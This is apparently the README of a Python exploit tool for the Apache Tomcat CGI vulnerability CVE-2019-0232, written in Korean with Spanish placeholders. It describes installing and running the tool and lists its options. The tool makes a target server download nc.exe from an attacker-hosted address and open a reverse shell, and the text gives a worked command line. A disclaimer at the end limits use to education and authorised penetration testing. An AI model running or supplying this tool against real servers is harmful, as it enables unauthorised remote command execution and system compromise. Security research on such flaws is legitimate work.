
CVE-2019-0232를 대상으로 하는 Python 익스플로잇으로, Apache Tomcat CGI 취약점을 활용하여 자동화된 리버스 셸 연결 및 사용자 지정 가능한 대상/공격자 매개변수를 제공합니다.
Apache Tomcat 서버의 CGI 취약점을 악용하여 리버스 셸 연결을 실행하도록 설계된 Python 스크립트입니다.

requests 라이브러리git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
-t, --target: Apache Tomcat이 실행 중인 대상 IP 주소-i, --ip: nc.exe를 호스팅하는 공격자 IP 주소-ncp, --nc-port: 리버스 셸 연결용 포트-p, --port: 대상 포트 (기본값: 8080)-sp, --server-port: nc.exe를 호스팅할 서버 포트 (기본값: 80)-cgi, --cgi-script: 악용할 CGI 스크립트 이름 (기본값: cmd.bat)python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
이 도구는 교육 목적 및 승인된 침투 테스트용으로만 제공됩니다. 작성자와 기여자는 이 스크립트로 인한 오용이나 피해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 승인을 받으십시오.